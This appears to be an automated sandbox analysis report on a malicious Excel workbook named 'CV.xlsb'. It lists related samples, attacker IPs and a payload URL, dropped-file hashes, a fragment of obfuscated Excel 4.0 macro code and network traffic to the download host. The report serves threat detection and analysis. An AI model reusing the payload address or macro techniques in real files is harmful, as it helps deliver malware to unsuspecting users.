                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20/cXQT5g

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    PONYNETUS7840134D.exeGet hashmaliciousBrowse
                                                                                                                                                    • 167.88.170.103
                                                                                                                                                    CV.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20
                                                                                                                                                    https://papyrefb2tdk6czd.onion.ly/Get hashmaliciousBrowse
                                                                                                                                                    • 198.251.89.118
                                                                                                                                                    https://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion.lyGet hashmaliciousBrowse
                                                                                                                                                    • 198.251.89.118
                                                                                                                                                    http://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion.lyGet hashmaliciousBrowse
                                                                                                                                                    • 198.251.89.118
                                                                                                                                                    SecuriteInfo.com.ArtemisA8D086952534.exeGet hashmaliciousBrowse
                                                                                                                                                    • 167.88.170.103
                                                                                                                                                    http://naturalhub-diet.world/shake.php?a=1nou&c=diet&s=330788,UEMRADAPDP38712Get hashmaliciousBrowse
                                                                                                                                                    • 209.141.40.184
                                                                                                                                                    Quickbooks-52598NOV.wsfGet hashmaliciousBrowse
                                                                                                                                                    • 209.141.42.71
                                                                                                                                                    https://urlprotection-sjl.global.sonicwall.com/click?PV=1&MSGID=202011121700210567221&URLID=12&ESV=10.0.9.5115&IV=96C84E4D3CD6E1B3687B4725D49ACC48&TT=1605200441368&ESN=o9kvhmPqyp%2BcdCbr6%2B5AlC%2FDxZxbBUV7HS3EcP1G5pA%3D&KV=1536961729279&ENCODED_URL=https%3A%2F%2Fteamgrouppcl-my.sharepoint.com%2F%3Au%3A%2Fg%2Fpersonal%2Fnongluck_m_attconsult_com%2FEUMhZAOXwpNGi0mlED8_GS0BlNUmsBRsk_GjzqCnTE543g%3Fdownload%3D1%26utm_content%3DNewClient%26utm_campaign%3Dwebsite%26utm_source%3DJulyWazePromo%26utm_medium%3DEmail&HK=2880A45B85BD1D7F235772EACD5B24AA03960F780A5D1B62240B80C3C42285F3Get hashmaliciousBrowse
                                                                                                                                                    • 209.141.42.71
                                                                                                                                                    E3FvBBM0A6.exeGet hashmaliciousBrowse
                                                                                                                                                    • 199.195.250.165
                                                                                                                                                    jtFF5EQoEE.exeGet hashmaliciousBrowse
                                                                                                                                                    • 209.141.38.71
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20
                                                                                                                                                    WKTniKeGUx.exeGet hashmaliciousBrowse
                                                                                                                                                    • 199.195.250.165
                                                                                                                                                    Reference Number -MT103-002239389960011.exeGet hashmaliciousBrowse
                                                                                                                                                    • 167.88.160.137
                                                                                                                                                    https://bit.ly/3kP7Cn3Get hashmaliciousBrowse
                                                                                                                                                    • 209.141.40.184
                                                                                                                                                    https://bit.ly/2HWBvnhGet hashmaliciousBrowse
                                                                                                                                                    • 209.141.40.184
                                                                                                                                                    run32dll.exeGet hashmaliciousBrowse
                                                                                                                                                    • 198.251.89.29
                                                                                                                                                    servicess64 - Copy.exeGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.126.172
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20
                                                                                                                                                    myResume.xlsbGet hashmaliciousBrowse
                                                                                                                                                    • 205.185.113.20

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\DA768304-9386-4C06-A952-5E2BC6B1C13F
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):129952
                                                                                                                                                    Entropy (8bit):5.37832394575212
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:/cQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:1mQ9DQW+zBX8u
                                                                                                                                                    MD5:AEA5BF70490B9D94F64E57F858BF4F2A
                                                                                                                                                    SHA1:762623EA333E61C4DB03C2E1987E3CE643DFF8FB
                                                                                                                                                    SHA-256:5CEC577D9B9D5FB58FEA54DA3F71FB05C814256F59CFA3E2AEA01C08D2D3470A
                                                                                                                                                    SHA-512:DCA3E9BE502348E92C0CEA3C7F116F9C878816BD2392AB4ECC14CD156C14327FAB94560AC83D413947896763BB4468099A7D7ACF440FA68BDD4EF163FE0B5BBE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-19T06:13:32">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D84BB939.jpeg
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1011x567, frames 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):55961
                                                                                                                                                    Entropy (8bit):7.8745563773940725
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:QUQt43PNewplZDlm1ajiDPnp3AvLJ03ntpE3g+O0t2DoV:UwbZRQJAd0MrO0UEV
                                                                                                                                                    MD5:102DCD780DA80675F5038CFB42D936CE
                                                                                                                                                    SHA1:417033D6C45E4209909A2EF7B5436673A74FB164
                                                                                                                                                    SHA-256:88F6B392616EA29C03682E3EC079F58C5E8BDC18C7CCB09BA6D5DC0BEDC13EA8
                                                                                                                                                    SHA-512:6478CD1B6F256ABA81374018B751D4ABE03B99B6A1CCB528D97E2ADA7558373161F002CA7D8D6088E897390F9A0F2CE3E925C604B3F855C1EBAA04E53F01ECEF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                    Preview: ......JFIF.....`.`.....C....................................................................C.......................................................................7...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..~.L.Q._>~.*...M..@.L.2(..RdR..(.2*.....v...F.~=h.z.qv........I.FE.-...dP..I.FE.-...dP..I.FE.-...dP..I.FE.-...dP..I.FE.-..h...L.2(.h..ZL..Z(...)2(.....Va@.E&E....RdR.....L.~F(.v.{R'SH...b.6......"...-...dP..I.FE.-...dP..I.F.@.E(.8...L.2(.h..".....P.E......2(..QI.2(.h.."...L.2(.h.."...L.2(.h.."...L.2(.h.."...L.2(.h.....8.....L..Z)2(...."...Z)2(...."...Z
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\DFC40000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):230247
                                                                                                                                                    Entropy (8bit):7.9534300042758455
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:7YQ0uirWMtgX1AmR+BjZ0ba+ZA+2ZOJAd0MrO0UEEjYcuf7bZGL:7/0NablEB902+CxAJAdFrOpEjf7dGL
                                                                                                                                                    MD5:F784321AF3936F35E09681E6519E85D6
                                                                                                                                                    SHA1:2F03E88538A8D09423996AA1C59263C9A04D4BF4
                                                                                                                                                    SHA-256:99E04F322341F56974D2D0A872074E4C2937E65BB4350374EE8A5C33DCE49A5F
                                                                                                                                                    SHA-512:343841BB03BD22C7770E5A4FF669983CFDFEFB54F173C5EA72642AB21094A1DE4898E20D83E62B949BE04A0A26FE443DCA42070BDB0A52B436474CCB92A4222F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .Ko.1......F.V3.n...C.m.l#5...}a\...$.....y.. ..nxy.9......taMu.1i.Z....I.........T).....Z..DN'../..RU.]jI.s8.4...H......G+ry.g4.9.3.|4:...... ..w..+...E.xE.7..T.V..^-.......&=..!.-E....N="..TM...I...CA'.....P...s..qF..:.1......7>./..7O...6..`................?N...h......nz.M..}].....N....-.C.B...Mk........}...H8>!.........$..H8.".`#, ....H2.%R..LeXB.aIU.%V..\eX..aIV.%Y9.d.X..cIV.%Y9.d.X..cIV.V.K..tx<<A....mS^.H/.{t%.......K......wp.(nz..~q......-..y.!..*....[+..u(B...M.....8.B.....M...M..n........PK..........!.6u..............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):22
                                                                                                                                                    Entropy (8bit):2.9808259362290785
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                    MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                    SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                    SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                    SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                    C:\Users\user\Desktop\~$CV.xlsb
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165
                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                    Entropy (8bit):7.92978748844578
                                                                                                                                                    TrID:
                                                                                                                                                    • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                    • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                    File name:CV.xlsb
                                                                                                                                                    File size:257680
                                                                                                                                                    MD5:08b6718f28bd303f0b407e0ec0f30872
                                                                                                                                                    SHA1:824489d6a73609db8763172a2e9f2e9d9f7c63a4
                                                                                                                                                    SHA256:65d6c6478fb750394d0517f5ff77fa13dfd354dbbec4cff3ec9e897bf8e3e926
                                                                                                                                                    SHA512:b4cd8a99f70c1aea542db3b3eb518b07a23a64d7fe2ebf057cec361ba922dad6b8e979cf0506ac733c3792d99cdff662f45b9b20f282f73bcdc0d08f19e5e029
                                                                                                                                                    SSDEEP:6144:ut2q/WAdBZ5selVUXkh4i6hO10SD5N2ZOJAd0MrO0UE6S+sf1FA:u4q/WIBzMz60SWAJAdFrOpEKsf1+
                                                                                                                                                    File Content Preview:PK..........!...?.....4.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "CV.xlsb"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:
                                                                                                                                                    Application Name:
                                                                                                                                                    Encrypted Document:
                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=APP.TITLE(BaaCKWySxWnNnysLuRBMSOZqFNOYvqTVCIbjZFzByEovDT),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,i,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=ALERT(vwuzXdkPcbruxpPdWHoqLnsGDlyYYzIVwRvUlMmxrK),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,e,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CLOSE.ALL(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,J,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=ALERT(an),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=CANCEL.KEY(TRUE),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                                                                                    Network Behavior

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 19, 2020 07:13:37.483485937 CET4973080192.168.2.4205.185.113.20
                                                                                                                                                    Nov 19, 2020 07:13:37.636163950 CET8049730205.185.113.20192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:37.636300087 CET4973080192.168.2.4205.185.113.20
                                                                                                                                                    Nov 19, 2020 07:13:37.637028933 CET4973080192.168.2.4205.185.113.20
                                                                                                                                                    Nov 19, 2020 07:13:37.789834023 CET8049730205.185.113.20192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:37.807643890 CET8049730205.185.113.20192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:37.807776928 CET4973080192.168.2.4205.185.113.20
                                                                                                                                                    Nov 19, 2020 07:14:42.814584017 CET8049730205.185.113.20192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:42.814827919 CET4973080192.168.2.4205.185.113.20
                                                                                                                                                    Nov 19, 2020 07:15:22.417685032 CET4973080192.168.2.4205.185.113.20
                                                                                                                                                    Nov 19, 2020 07:15:22.570553064 CET8049730205.185.113.20192.168.2.4

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 19, 2020 07:13:31.101139069 CET4925753192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:31.114178896 CET53492578.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:31.895114899 CET6238953192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:31.908174038 CET53623898.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:32.465002060 CET4991053192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:32.485233068 CET53499108.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:32.826827049 CET5585453192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:32.853514910 CET53558548.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:33.828351974 CET5585453192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:33.861640930 CET53558548.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:34.843859911 CET5585453192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:34.856745958 CET53558548.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:36.859230042 CET5585453192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:36.872355938 CET53558548.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:37.446244001 CET6454953192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:37.458714962 CET53645498.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:38.143460035 CET6315353192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:38.156133890 CET53631538.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:39.295284986 CET5299153192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:39.308311939 CET53529918.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:39.999226093 CET5370053192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:40.013391972 CET53537008.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:40.879705906 CET5585453192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:40.893085003 CET53558548.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:41.021157026 CET5172653192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:41.034384012 CET53517268.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:41.825484037 CET5679453192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:41.839240074 CET53567948.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:43.280380011 CET5653453192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:43.293525934 CET53565348.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:45.479195118 CET5662753192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:45.492321014 CET53566278.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:46.307209969 CET5662153192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:46.319406986 CET53566218.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:47.415545940 CET6311653192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:47.428611994 CET53631168.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:47.877537012 CET6407853192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:47.890125990 CET53640788.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:48.466047049 CET6480153192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:48.478480101 CET53648018.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:49.480022907 CET6172153192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:49.492300034 CET53617218.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:50.294714928 CET5125553192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:50.307101011 CET53512558.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:13:51.309216976 CET6152253192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:13:51.323277950 CET53615228.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:08.239589930 CET5233753192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:08.300632000 CET53523378.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:08.779867887 CET5504653192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:08.852653980 CET53550468.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:09.245389938 CET4961253192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:09.278652906 CET53496128.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:09.975436926 CET4928553192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:09.991835117 CET53492858.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:10.022120953 CET5060153192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:10.048022032 CET53506018.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:10.387995005 CET6087553192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:10.401609898 CET53608758.8.8.8192.168.2.4
                                                                                                                                                    Nov 19, 2020 07:14:10.682527065 CET5644853192.168.2.48.8.8.8
                                                                                                                                                    Nov 19, 2020 07:14:10.695374012 CET53564488.8.8.8192.168.2.4
